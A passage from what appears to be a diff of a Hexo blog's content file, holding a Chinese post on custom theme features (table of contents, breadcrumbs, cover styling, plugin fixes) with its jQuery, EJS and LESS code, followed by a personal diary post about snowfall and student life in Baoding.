    <span class="post-toc-title">导航</span>
    <ol class="toc"></ol>
    </div>
    <div class="rightside-button hidden" id="js-toc">
    <span>
    <img src="<%- theme.icon.toc %>" class="rightside-button-icon" alt="Icon">
    </span>
    </div>
    <%- js('js/toc.js');%>
    <script>
    initToc();
    </script>
    <% } %>
    <div class="rightside-button" id="js-go_top">
    <span>
    <img src="<%- theme.icon.go_top %>" class="rightside-button-icon" alt="Icon">
    </span>
    </div>
    <div class="rightside-button" id="js-go_bottom">
    <span>
    <img src="<%- theme.icon.go_bottom %>" class="rightside-button-icon" alt="Icon">
    </span>
    </div>
    </div>

    <script>
    $('#js-go_top')
    .gotoPosition( {
    speed: 300,
    target: 'top',
    } );
    $('#js-go_bottom')
    .gotoPosition( {
    speed: 300,
    target: 'bottom',
    } );
    </script>

    goto_position.js

    ​ 魔改原来的 goTop.js 使其可以也滚动到底部:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    (function ($) {
    jQuery.fn.gotoPosition = function (opt) {
    var ele = this;
    var win = $(window);
    var doc = $("html,body");
    var defaultOpt = {
    speed: 500,
    iconSpeed: 200,
    animationShow: {
    opacity: "1",
    },
    animationHide: {
    opacity: "0",
    },
    };
    var options = $.extend(defaultOpt, opt);

    ele.click(function () {
    var targetOffset = 0;
    if (opt && opt.target) {
    if (opt.target === "top") {
    targetOffset = 0; // 跳转至文档顶部
    } else if (opt.target === "bottom") {
    targetOffset = $(document).height() - win.height(); // 跳转至文档底部
    }
    }
    doc.animate(
    {
    scrollTop: targetOffset, // 将文档元素滚动到目标位置
    },
    options.speed
    );
    });
    };
    })(jQuery);

    toc.js

    function initToc()

    ​ 初始化目录,如果文章没有被加密(类名为 hbehbe-content 的元素)不存在,则移除目录的 hidden 类。

    ​ 模仿 Butterfly,借助 localStorage 判断默认状态下是否显示目录。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    function initToc() {
    // 检查是否存在具有类名为 'hbe' 和 'hbe-content' 的元素
    if ($('.hbe.hbe-content').length > 0) {
    // 如果存在该元素,则给 '.rightside-button' 和 '.post-toc' 添加 'hidden' 类
    $('.rightside-button, .post-toc').addClass('hidden');
    return;
    } else {
    // 找到类名为 .rightside-button 的元素,并移除 hidden 类
    $('.rightside-button').removeClass('hidden');
    // 找到类名为 .post-toc 的元素,并移除 hidden 类
    $('.post-toc').removeClass('hidden');
    }

    var value = localStorage.getItem('aside-status');
    if (value === null) { // 如果存储项不存在,则创建它
    localStorage.setItem('aside-status', "true");
    value = true;
    }
    if (value === "true") {
    $("#post-toc").addClass("show-toc");
    $("#content").addClass("show-toc");
    }
    createToc();
    }
    createToc()

    创建目录:

    • <ol class="toc-child"></ol> 里不断追加元素
    • 点击目录中的元素会平滑跳转到对应的位置。
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    function createToc() {
    var toc = $('.toc');
    toc.empty();

    var headings = $('#content').find('h1, h2, h3, h4, h5, h6');
    var currentLevel = 1;
    var currentList = toc;

    for (var i = 0; i < headings.length; i++) {
    var heading = $(headings[i]);
    // ID 开头不能为数字,如果为了,加个下划线
    if (/^[0-9]/.test(heading.attr('id'))) {
    heading.attr('id', '_' + heading.attr('id'));
    }
    if (!heading.find('a').length) // 标题里没有<a>,可能是用户自己创建的标题,跳过
    continue;
    var level = parseInt(heading.prop('tagName').charAt(1));
    // 创建目录
    if (level > currentLevel) {
    for (var j = currentLevel + 1; j <= level; j++) {
    var newOl = $('<ol>').addClass('toc-child');
    var newLi = $('<li>').addClass('toc-item toc-level-level1-' + j);
    currentList.append(newLi);
    newLi.append(newOl);
    currentList = newOl;
    }
    } else if (level < currentLevel) {
    for (var j = level; j < currentLevel; j++) {
    currentList = currentList.parent().parent();
    }
    }
    var li = $('<li>').addClass('toc-item toc-level-level-' + level);
    // 获取 hrefValue
    var hrefValue = heading.html().match(/href="([^"]+)"/) ? heading.html().match(/href="([^"]+)"/)[1] : '';
    // ID 开头不能为数字,如果为了,加个下划线
    if (!isNaN(parseInt(hrefValue.charAt(1)))) {
    hrefValue = hrefValue.slice(0, 1) + "_" + hrefValue.slice(1);
    }
    // 获取 titleValue
    var titleValue = heading.html().match(/title="([^"]+)"/) ? heading.html().match(/title="([^"]+)"/)[1] : '';
    // 创建 <a>
    li.html('<a class="toc-link" href="' + hrefValue + '"><span class="toc-text">' + titleValue + '</span></a>');
    var a = li.find("a");
    // 重写点击目录时的跳转逻辑
    a.on("click", function (event) {
    event.preventDefault();
    var element = $($(this).attr("href"));
    var rect = element[0].getBoundingClientRect();
    var topOffset = rect.top + window.scrollY - 90; // 有顶端栏的存在,-90
    window.scrollTo({
    top: topOffset,
    behavior: "smooth"
    });
    });
    currentList.append(li);
    currentLevel = level;
    }
    }
    $(“#js-toc”).click()

    ​ 点击按钮,控制目录是否展示。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    $("#js-toc").click(function () {
    var postToc = $("#post-toc");
    var content = $("#content");
    if (!postToc.hasClass("show-toc")) {
    localStorage.setItem('aside-status', true);
    content.addClass("show-toc");
    postToc.addClass("show-toc");
    } else {
    content.removeClass("show-toc");
    postToc.removeClass("show-toc");
    localStorage.setItem('aside-status', false);
    }
    });

    ​ 用于控制目录是否显示,送它一个 show-toc 类,剩下的交给 less。

    function getTopHeadingId()

    ​ 获取当前网页最顶端标题的 id,抄着下面的代码,-110 是考虑到了主题顶端栏的存在:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    function getTopHeadingId() {
    const headings = document.querySelector('#content').querySelectorAll('h1, h2, h3, h4, h5, h6');
    let topHeadingId = null;
    let minDistanceFromTop = Infinity;
    for (const heading of headings) {
    const boundingRect = heading.getBoundingClientRect();
    const distanceFromTop = Math.abs(boundingRect.y - 90);
    if (distanceFromTop < minDistanceFromTop) {
    minDistanceFromTop = distanceFromTop;
    topHeadingId = heading.id;
    }
    }
    return topHeadingId;
    }
    document.addEventListener()

    ​ 目录会根据当前所在位置高亮标题,送它一个 active 类,剩下的交给 less。

    ​ 当当前标题不在显示范围时,再给它强行滚动到可见范围。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    document.addEventListener("scroll", function (event) {
    const tocLinks = document.querySelectorAll('a.toc-link');
    const topHeadingId = getTopHeadingId();
    tocLinks.forEach(link => {
    var href = decodeURIComponent(link.getAttribute('href')).replace(/^#/, '');;
    if (href == topHeadingId) {
    if (!link.classList.contains('active')) {
    link.classList.add("active");
    var toc = document.querySelector(".toc");
    var activeItem = toc.querySelector(".active");
    if (activeItem) {
    toc.scrollTo({
    top: activeItem.offsetTop - 100
    });
    }
    }
    } else {
    link.classList.remove("active");
    }
    });
    }, 3000);

    toc.less

    ​ 继续模仿 Butterfly 的布局,展示目录的时候,主页面会向左移动,同时写了移动端的适配。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    107
    108
    109
    110
    111
    112
    113
    114
    115
    116
    117
    118
    119
    120
    121
    122
    123
    124
    125
    126
    127
    128
    .post-toc {
    border-radius: 10px;
    background: rgba(255, 255, 255, 0.9);
    box-shadow: 0 0 40px 0 rgba(50, 50, 50, 0.08);
    padding: 10px 5px 10px 5px;
    border: 1px solid rgba(18, 24, 58, 0.06);

    .post-toc-title {
    margin-left: 15px;
    font-weight: bold;
    color: #424242;
    font-size: 18px;
    }

    .toc {
    margin: 12px 5px 5px 5px;
    display: block;
    overflow: auto;
    }
    .toc::-webkit-scrollbar {
    width: 5px;
    height: 5px;
    }

    .toc::-webkit-scrollbar-thumb {
    background-color: #AAA; /* 修改滚动条滑块的颜色 */
    border-radius: 10px;
    }


    a {
    text-decoration: none;
    }

    ol {
    display: inline;
    list-style-type: none;

    a.active.toc-link {
    .toc-text {
    color: #FFF;
    }
    }

    .toc-link {
    margin-right: 5px;
    padding-top: 5px;
    padding-bottom: 5px;
    display: block;
    }

    li {
    margin-left: 10px;
    background: none;

    .toc-text {
    padding: 0 5px;
    color: #898fa0;
    }

    .active {
    span{
    padding: 4px 10px;
    border-radius: 8px;
    background: rgba(0, 106, 255, 0.8);
    }
    }

    }

    span:hover {
    color: #4183c4;
    }
    }
    }

    @media screen and (min-width: 1100px) {
    .post-toc {
    z-index: 2;
    position: fixed;
    bottom: 200px;
    width: 260px;
    right: -250px;
    transition: right 0.5s ease-out;
    }

    .toc {
    max-height: 40vh;
    }

    .post-toc.show-toc {
    right: min(30px, 2vw);
    }

    .post-toc.show-toc.hidden{
    right: -250px;
    }

    .post-content.show-toc{
    max-width: min(960px, 80vw);
    transform: translateX(calc(-0.1 * min(960px, 80vw)));
    }
    }

    @media screen and (max-width: 1100px) {
    .post-toc {
    z-index: 2;
    position: fixed;
    bottom: -30vh;
    min-width: 40vw;
    max-width: calc(75vw - 10px);
    right: min(70px, calc(10vw + 30px));
    margin-left: 20px;
    transition: bottom 0.5s ease-out;
    }

    .toc {
    max-height: 16vh;
    }

    .post-toc.show-toc {
    bottom: 20px;
    }

    .post-toc.show-toc.hidden{
    right: -30vh;
    }
    }

    dispatch_event.js

    ​ 新版的 hexo-blog-encrypt 提供了解密后的回调函数,更新这个插件:

    1
    npm update hexo-blog-encrypt

    After Decrypt Event

    Thanks to @f-dong, we now will trigger a event named hexo-blog-decrypt, so you can add a call back to listen to that event.

    1
    2
    3
    // trigger event
    var event = new Event('hexo-blog-decrypt');
    window.dispatchEvent(event);

    ​ 在解密后重新初始化目录:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    // trigger event
    var event = new Event('hexo-blog-decrypt');
    window.dispatchEvent(event);

    // 定义回调函数
    function handleHexoBlogDecryptEvent() {
    console.log("文章解密成功!");
    initToc();
    }

    // 添加事件监听器
    window.addEventListener('hexo-blog-decrypt', handleHexoBlogDecryptEvent);

    演示

    ​ 电脑端:

    png

    ​ 移动端:

    png

    标题图超框

    ​ 这是自己突发奇想原创的一个功能,增加一个变量控制这个功能让其看上去没有那么屎山。

    代码

    home.ejs

    ​ 修改 home.ejs,增加 post.cover_style 变量允许文章头部的 yaml 控制标题图的 style:

    1
    2
    3
    <div class="img-container">
    <img style="<%- post.cover_style || '' %>" src="<%= post.cover ? post.cover : theme.default_cover %>" alt="Cover">
    </div>

    home.less

    ​ 对应 less:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    .img-container {
    width: 100%;
    height: 200px;
    background: @headerBackgroundColor;
    position: relative;
    img {
    width: 100%;
    height: 100%;
    object-fit: cover;
    display: block;
    }
    }

    超框图制作

    ​ 用 PS 修一个超框图,就决定是你了,癫狂公爵西塔尔!疯子也要有教养。

    ​ 我一般的 cover 都是设成 800px * 450px 的,这个封面图设置为 800px * 738px,用 PS 保证“框”的高度为 450px,“框“的顶部距离画面顶部 150px。

    png

    cover_style

    ​ 文章自定义 cover_style

    1
    cover_style: "height: 164%; position: absolute; top: 0; left: 0; transform: translateY(-20.3%);"

    ​ 覆盖之前的封面图样式:

    • height: 164%;:由 738 / 450 = 1.64 得到。
    • position: absolute; top: 0; left: 0; object-fit: contain; 超框的处理。
    • transform: translateY(-20.3%);" 向上移 20.3%,因为 150 / 738 ≈ 20.3%。

    演示

    ​ 帅呆了!

    png

    置顶图标

    ​ 对于含有 top 属性的文章,增加一个置顶图标。

    代码

    home.ejs

    1
    2
    3
    <% if(post.top){ %>
    <img src="<%= theme.icon.stiky %>" class="stiky" alt="Icon">
    <% } %>

    home.less

    ​ 对应的:

    1
    2
    3
    4
    5
    .stiky{
    width: 18px;
    height: 18px;
    margin: 8px 6px 0 0;
    }

    演示

    png

    加密图标

    ​ 首页展示这个文章是否被加密,防止白点一趟。

    代码

    home.ejs

    ​ 根据 post.password 的值是否为空判断这个文章是否被加密。

    1
    <img src="<%- post.password ? theme.icon.locked : theme.icon.normal %>" class="meat-type" alt="Icon">

    演示

    png

    面包屑导航栏

    ​ 设计的嵌套页面太深了,设计一个面包屑导航栏防止迷路。

    header.ejs

    ​ 添加一个 <ul> 以放置导航栏。

    1
    2
    3
    4
    5
    6
    <div class="h-left">
    <a href="<%= theme.menus_link.home %>" class="logo">
    <img src="<%- theme.logo %>" alt="Quiet">
    </a>
    <ul class="breadcrumb" id="breadcrumb"></ul>
    </div>

    ​ 底部调用 js,并传参(从 yaml 传参给 JS 还蛮复杂的,要花点脑经):

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    <%- js('js/breadcrumb.js') %>
    <script>
    var menus_title = [];
    <% Object.keys(theme.menus_title).forEach(function(menu) { %>
    menus_title.push({<%= menu %>: '<%= theme.menus_title[menu] %>'});
    <% }); %>
    <% if(page.categories){ %>
    <% page.categories.data.map((cat)=>{ %>
    categoriesBreadcrumb(document.getElementById('breadcrumb'), "<%- cat.name %>", "/categories/<%- cat.name %>");
    <% }) %>
    <% } else { %>
    customBreadcrumb(document.getElementById('breadcrumb'), menus_title);
    <% } %>
    </script>

    ​ 设计两种面包屑导航栏:

    • customBreadcrumb 简单地根据页面网址生成导航栏。
    • categoriesBreadcrumb 对于常规的推文,根据它的类别生成导航栏。

    function customBreadcrumb()

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    function customBreadcrumb(breadcrumb, menus_title) {
    // 获取当前页面路径
    var path = window.location.pathname;
    var levels = path.split('/');
    levels.shift(); // 移除第一个空字符串元素
    levels.pop(); // 移除最后一个空字符串元素

    // 生成面包屑导航
    for (var i = 0; i < levels.length; i++) {
    var levelLink = '/';
    for (var j = 0; j <= i; j++) {
    levelLink += levels[j] + '/';
    }
    var levelName = decodeURIComponent(levels[i]);

    if (i === 0) {
    // 查找 menus_title 中与 levelName 相同的键,并获取对应的值
    var title_obj = menus_title.find(function(item) {
    return item[levelName] !== undefined;
    });
    var title_value = title_obj ? title_obj[levelName] : null;
    if (!title_value) {
    return; // 如果找不到对应的值,直接返回,不执行后续代码
    }
    }
    }

    // 如果代码执行到这里,说明所有的值都能找到,可以继续添加元素到面包屑导航栏
    for (var i = 0; i < levels.length; i++) {
    var levelLink = '/';
    for (var j = 0; j <= i; j++) {
    levelLink += levels[j] + '/';
    }
    var levelName = decodeURIComponent(levels[i]);
    var li = document.createElement('li');
    var a = document.createElement('a');
    {
    if (i === 0) {
    a.textContent = title_value;
    } else {
    a.textContent = levelName;
    }
    if(i == levels.length - 1) {
    a.classList.add("last");
    }
    a.href = levelLink;
    }
    li.appendChild(a);
    breadcrumb.appendChild(li);
    }
    }

    function categoriesBreadcrumb()

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    function categoriesBreadcrumb(breadcrumb, categories, categoriesLink) {
    var li = document.createElement('li');
    var a = document.createElement('a');

    a.textContent = categories;
    a.href = categoriesLink;
    li.appendChild(a);
    breadcrumb.appendChild(li);

    li = document.createElement('li');
    a = document.createElement('a');

    a.textContent = "文章";
    a.href = window.location.href;
    a.classList.add("last");

    li.appendChild(a);
    breadcrumb.appendChild(li);
    }

    header.less

    ​ 在 hearer.less 的相应位置设置样式:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    .breadcrumb {
    margin-left: 5px;
    display: flex;
    list-style: none;
    padding: 0;
    a{
    color: #898fa0;
    text-decoration: none;
    }
    .last{
    color: #12183A;
    }
    .dot {
    display: inline-block;
    width: 5px;
    height: 5px;
    border-radius: 50%;
    background: #006AFF;
    position: relative;
    top: -12px;
    left: 2px;
    }
    }

    .breadcrumb li::before {
    color: #898fa0;
    content: ">";
    margin: 0 5px;
    }

    ​ 修改一下对于手机端的适配:

    1
    2
    3
    4
    5
    6
    7
    @media screen and (max-width:660px) {
    .header {
    .header-top {
    .h-left {
    flex-grow: 3;
    }
    ...

    效果

    customBreadcrumb

    png

    function categoriesBreadcrumb()

    png

    hexo-tag-aplayer 与 hexo-blog-encrypt 冲突

    ​ 这似乎是个通病,无论什么主题都有这种问题。

    ​ 在使用 Aplayer 的推文前面加上标记:

    1
    APlayer: true

    ​ 从 APlayer: APlayer 是一个简约且漂亮的 HTML5 音乐播放器,支持多种模式,包括播放列表模式、吸底模式 (gitee.com) 搞到 APlayer.min.cssAPlayer.min.js 放到对应目录下。

    ​ 修改 header.ejs

    1
    2
    3
    4
    <% if(page.APlayer) { %>
    <%- css('css/third-party/APlayer.min.css') %>
    <%- js('js/third-party/APlayer.min.js') %>
    <% } %>

    source/_config.yml 下设置参数避免重复调用(hexo-tag-aplayer/docs/README-zh_cn.md at master · MoePlayer/hexo-tag-aplayer (github.com)

    1
    2
    aplayer:
    asset_inject: false

    ​ OK 了,我想 hexo-tag-map 插件也是同理,不过这个插件我不太喜欢,也很久没用了,还是不设置了。

    Giscus 评论系统

    ​ 将评论系统改成:giscus

    tabs

    ​ 使用方法:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    {% tabs Unique name, [index] %}
    <!-- tab [Tab caption] [@icon] -->
    Any content (support inline tags too).
    <!-- endtab -->
    {% endtabs %}

    Unique name : Unique name of tabs block tag without comma.
    Will be used in #id's as prefix for each tab with their index numbers.
    If there are whitespaces in name, for generate #id all whitespaces will replaced by dashes.
    Only for current url of post/page must be unique!
    [index] : Index number of active tab.
    If not specified, first tab (1) will be selected.
    If index is -1, no tab will be selected. It's will be something like spoiler.
    Optional parameter.
    [Tab caption] : Caption of current tab.
    If not caption specified, unique name with tab index suffix will be used as caption of tab.
    If not caption specified, but specified icon, caption will empty.
    Optional parameter.
    [@icon] : FontAwesome icon name (full-name, look like 'fas fa-font')
    Can be specified with or without space; e.g. 'Tab caption @icon' similar to 'Tab caption@icon'.
    Optional parameter.

    tab 名字为第一个 Tab

    只有图标 没有 Tab 名字

    名字+icon

    hide

    ​ 搬运自 butterfly:Butterfly 安裝文檔(三) 主題配置-1 | Butterfly

    ​ 2.2.0 以上提供

    ​ 請注意,tag-hide 內的標簽外掛 content 內都不建議有 h1 - h6 等標題。因為 Toc 會把隱藏內容標題也顯示出來,而且當滾動屏幕時,如果隱藏內容沒有顯示出來,會導致 Toc 的滾動出現異常。

    inline

    inline 在文本里面添加按鈕隱藏內容,只限文字

    ​ ( content 不能包含英文逗號,可用 &sbquo;)

    1
    2
    3
    哪個英文字母最酷?{% hideInline 因為西裝褲(C 裝酷),查看答案,#FF7242,#fff %}

    門裏站着一個人? {% hideInline 閃 %}

    哪個英文字母最酷?因為西裝褲(C 裝酷)

    門裏站着一個人?

    Block

    ​ block 獨立的 block 隱藏內容,可以隱藏很多內容,包括圖片,代碼塊等等

    ​ ( display 不能包含英文逗號,可用 &sbquo;)

    1
    2
    3
    4
    查看答案
    {% hideBlock 查看答案 %}
    傻子,怎麼可能有答案
    {% endhideBlock %}

    查看答案

    傻子,怎麼可能有答案

    Toggle

    ​ 如果你需要展示的內容太多,可以把它隱藏在收縮框裏,需要時再把它展開。

    ​ ( display 不能包含英文逗號,可用&sbquo;)

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    {% hideToggle Butterfly 安裝方法 %}
    在你的博客根目錄裏

    git clone -b master https://github.com/jerryc127/hexo-theme-butterfly.git themes/Butterfly

    如果想要安裝比較新的 dev 分支,可以

    git clone -b dev https://github.com/jerryc127/hexo-theme-butterfly.git themes/Butterfly

    {% endhideToggle %}
    Butterfly 安裝方法

    在你的博客根目錄裏

    git clone -b master https://github.com/jerryc127/hexo-theme-butterfly.git themes/Butterfly

    如果想要安裝比較新的 dev 分支,可以

    git clone -b dev https://github.com/jerryc127/hexo-theme-butterfly.git themes/Butterfly

    CSS 与 LESS

    ​ 一些浏览器似乎不支持 CSS 文件使用的一些语法,换成 LESS 就可行!

    png

    Inject

    介绍

    ​搬运自:Butterfly 安裝文檔(四) 主題配置-2 | Butterfly

    如想添加额外的 js/css/meta 等等东西,可以在 Inject 里添加,支持添加到head</body> 标签之前)和 bottom</html> 标签之前)。

    请注意:以标准的 html 格式添加内容

    1
    2
    3
    4
    5
    inject:
    head:
    - <link rel="stylesheet" href="/self.css">
    bottom:
    - <script src="xxxx"></script>

    ​这样还绕开了一些 JS 被加密插件搞崩的问题,真是太棒了!

    实现

    post_head.ejs 里添加:

    1
    2
    3
    4
    5
    6
    7
    <% if(page.inject) { %>
    <% if(page.inject.head) { %>
    <% for(let i = 0; i < page.inject.head.length; i++){ %>
    <%- page.inject.head[i] %>
    <% } %>
    <% } %>
    <% } %>

    footer.ejs 里添加:

    1
    2
    3
    4
    5
    6
    7
    <% if(page.inject) { %>
    <% if(page.inject.bottom) { %>
    <% for(let i = 0; i < page.inject.bottom.length; i++){ %>
    <%- page.inject.bottom[i] %>
    <% } %>
    <% } %>
    <% } %>

    折叠目录 2024/11/11

    ​现在目录终于可以像 butterfly 等主题一样折叠了!如果不想要折叠目录,需要在文章标头设置:

    1
    toc_collapsed: false

    其它

    • 还有一些 css 的调整没有放上去,按着自己的审美随便调了下。
    • 得益于自己的兴趣和 ChatGPT 强大的能力,让我即使没有系统地学过前端知识也能够编写许多代码,确实是个深坑啊!
    • 原主题还有一点编译错误,找机会修一修。
    • 最好把各种颜色都用变量存起来,不然太屎山了。
    • 想起了当时实习的时候看同事写的屎山代码,我已经尽力把代码写的比较规范了……
    ]]>
    @@ -3619,7 +3619,7 @@ /posts/Diary-8-%E7%99%BD%E8%8C%AB%E8%8C%AB/ - body{ background-image: url("background.webp"); background-attachment: fixed; background-size: cover; background-position: bottom; background-repeat: no-repeat; background-size: 100% auto; } .snow-cover{ position: relative; padding-bottom: 14.26%; margin-top: -70px; margin-bottom: -2em; background: url('snow.png'); background-size: contain; z-index: 4; pointer-events: none; transform: scaleX(1.2); @media screen and (max-width: 660px) { margin-top: -30px; } } .article-container { overflow-x: visible; }

    前言

    jpg

    梧桐与银杏

    ​ 12.11、12.13、12.14 这三天下了大雪,据说还是人工降雪,因为河北的污染已经严重到自然是无法下雪的😇。

    ​ 积雪把之前定好的锚点给盖住了,只好估摸着视角拍了😅。

    ​ 过了两周冀大才想起请来铲雪车铲雪,此时路面都已经结了厚厚的冰,真是孩子十八来奶了😡。

    ​ 统计 PM 值似乎意义不大,因为当天的波动太大了,看天空的颜色判断空气的质量就行了🤧。


    ​ 这两周个人的~~ CV 能力~~前端技术得到了大幅提升!这一行业还真是深坑啊!

    • 增加了积雪效果!

    • 按下这个 Jelly button 按钮就可以显示 / 关闭下雪效果!

    别下了冷死了!🥶

    ​ 真是一个不爱科研老摸鱼的大水逼干的好事!

    正文

    12.11

    ​ 这天是一个重要的日子!见到雪了,我发癫💃💃💃!

    jpg

    拍摄自保定动物园

    ​ 给没有见过世面的福建人看看什么叫下雪😎!

    有些 YY 就没见过了
    还搁这 30 度穿短袖呢
    你怎么知道今天我穿短袖
    今天巨热

    12.12

    我 ppt 做好了 咱什么时候开组会😈
    今晚上可以吗?
    可以
    大家今晚七点在 326 开组会,LTC 主讲。@全体成员

    ​ 由于明天要下大雪,导师决定将组会提前到今日。本来组会都是轻松愉快的,结果这周要汇报的师弟油腔滑调🫣,导致导师非常生气😡!场面一度十分尴尬。

    低气压
    太可怕了
    两年了都没见过导师发过火
    太可怕了
    连伟哥都不敢摸了

    12.13

    下大雪了
    哇哦
    提前下班!

    ​ 在实验室摸鱼的时候外面下起了大雪,跑出去看看。

    ​ 出于网页加载速度的考虑,只能把录的视频压缩成很小的 gif 了。

    厕所窗外
    实验室门口

    ​ 下雪天真是太冷了,看了一会儿又回去了。

    ​ 这才知道,下雪天是不用打伞的😯。

    太冷了
    提前上班!

    png

    福州你咋回事?

    ​ 这就是差距吧。虽然在写博客的这天福州也很冷了。


    jpg

    雪人⛄

    ​ 下午跟舍友一起去堆雪人去了。根据网课上看的堆雪人教程,先用手搓一个雪球,然后在地上不断滚,越滚越大就行了。

    ​ 四个人一人整了一个雪球,分别组成头部、身体和腿部,一个雪人就这么诞生了!

    宿舍堆的
    获得最丑奖

    jpg

    一阵乱扔

    ​ 之后又打了一阵雪仗,玩得差不多了,这时间也快到晚饭时间了,不如直接去整个火锅吧🤪。

    jpg

    火锅

    ​ 在冬天吃火锅还蛮舒服的。

    jpg

    确实厉害啊

    ​ 本来觉得自己堆的雪人还可以,直到看到别人堆的才发觉自己堆得是真丑啊🫣。

    12.14

    雪松

    ​ 又是一天大雪,我终于开始对雪有点厌烦了,主要是下雪天太难走路了。

    12.15

    ​ 雪停了。众所周知,雪融化是要吸热的,所以这段时间,保定气温迎来了急剧下降!不论穿得有多厚,根本不能在外面待太长时间,不然你会耳朵疼😈。


    jpg jpg
    积雪

    ​ 很遗憾,保定连扫雪的钱都掏不起,解决方法是等雪自然晾干😅。


    ​ 充分利用好这那个三个月的时间,而且八张卡的算力其实是相对比较充裕了,课题组内其他的同学也可以一起用嘛,然后三个月之后的话。嗯,我会跟那个你导师去大概聊一下,因为中间也涉及到一个三个月之后,他的一个商务层面儿东西,可能涉及到一些水电费的一些问题,我们会简单收取一些水电费的一个费用。所以到时候也会跟你导师说一下这个事儿。

    ​ 智算中心的算力到了,大抵是最后一批了,得抓紧时间继续这些算力炼一堆没有用的东西😇,真的蛮浪费的。

    12.16

    ​ 英语六级。非常不幸地把作文写偏题了,又得再来一次了😅。

    12.17

    jpg

    这是哪位阳光大男孩干的?

    ​ 打卡宿舍楼下的怪物。

    jpg

    Who lives in a pineapple under the sea?

    ​ 打卡银杏大道前的菠萝屋。

    12.18

    走了
    下一站

    ​ 又有一个小伙伴被裁了,大抵是要离开福州了🫣。

    12.20

    ​ 组会时间。研一的终于完成了他们的一次汇报周期,导师说下次组会要改变形式了。

    ​ 导师说不要再发大水刊了,不!我的 Electronics😭。

    ​ 离寒假剩下最后一个月的时间,这个学期也即将接近尾声……

    12.21

    ​ 配置好了智算中心的环境,继续开跑!

    12.23

    ​ 开始优化博客主题,之前很难实现的搜索功能终于在我和 ChatGPT 的不懈努力下实现了!

    12.24

    ​ 宿舍好不容易聚齐了六个人,于是决定去外面吃顿火锅。

    jpg

    LONGBOO 2024

    ​ 2024 就要来到了!

    ​ 平安夜这天一点过节的气氛都没有,万达门口没有任何圣诞节的元素🙄,只有一些卖圣诞小礼品的地摊小贩。据说只有教堂附近还有点过节的气息。

    jpg

    潮汕牛肉火锅

    ​ 获得汕头大学一日体验卡!还蛮合我口味的,肉很鲜,而且没有点辣的选项,我想湖南阳哥吃得肯定很扫兴😇!

    jpg

    吃着火锅唱着歌

    ​ 吃完火锅宿舍又去 KTV 唱歌,不喜欢 KTV 的我听他们嚎了一会儿就回去休息了😇。

    jpg

    Merry Christmas!

    ​ 整了个圣诞帽,买了一些平安果🍎,就当是过圣诞节了🤪。

    ]]>
    + body{ background-image: url("background.webp"); background-attachment: fixed; background-size: cover; background-position: bottom; background-repeat: no-repeat; background-size: 100% auto; } .snow-cover{ position: relative; padding-bottom: 14.26%; margin-top: -70px; margin-bottom: -2em; background: url('snow.png'); background-size: contain; z-index: 4; pointer-events: none; transform: scaleX(1.2); @media screen and (max-width: 660px) { margin-top: -30px; } } .article-container { overflow-x: visible; }

    前言

    jpg

    梧桐与银杏

    ​ 12.11、12.13、12.14 这三天下了大雪,据说还是人工降雪,因为河北的污染已经严重到自然是无法下雪的😇。

    ​ 积雪把之前定好的锚点给盖住了,只好估摸着视角拍了😅。

    ​ 过了两周冀大才想起请来铲雪车铲雪,此时路面都已经结了厚厚的冰,真是孩子十八来奶了😡。

    ​ 统计 PM 值似乎意义不大,因为当天的波动太大了,看天空的颜色判断空气的质量就行了🤧。


    ​ 这两周个人的~~ CV 能力~~前端技术得到了大幅提升!这一行业还真是深坑啊!

    • 增加了积雪效果!

    • 按下这个 Jelly button 按钮就可以显示 / 关闭下雪效果!

    别下了冷死了!🥶

    ​ 真是一个不爱科研老摸鱼的大水逼干的好事!

    正文

    12.11

    ​ 这天是一个重要的日子!见到雪了,我发癫💃💃💃!

    jpg

    拍摄自保定动物园

    ​ 给没有见过世面的福建人看看什么叫下雪😎!

    有些 YY 就没见过了
    还搁这 30 度穿短袖呢
    你怎么知道今天我穿短袖
    今天巨热

    12.12

    我 ppt 做好了 咱什么时候开组会😈
    今晚上可以吗?
    可以
    大家今晚七点在 326 开组会,LTC 主讲。@全体成员

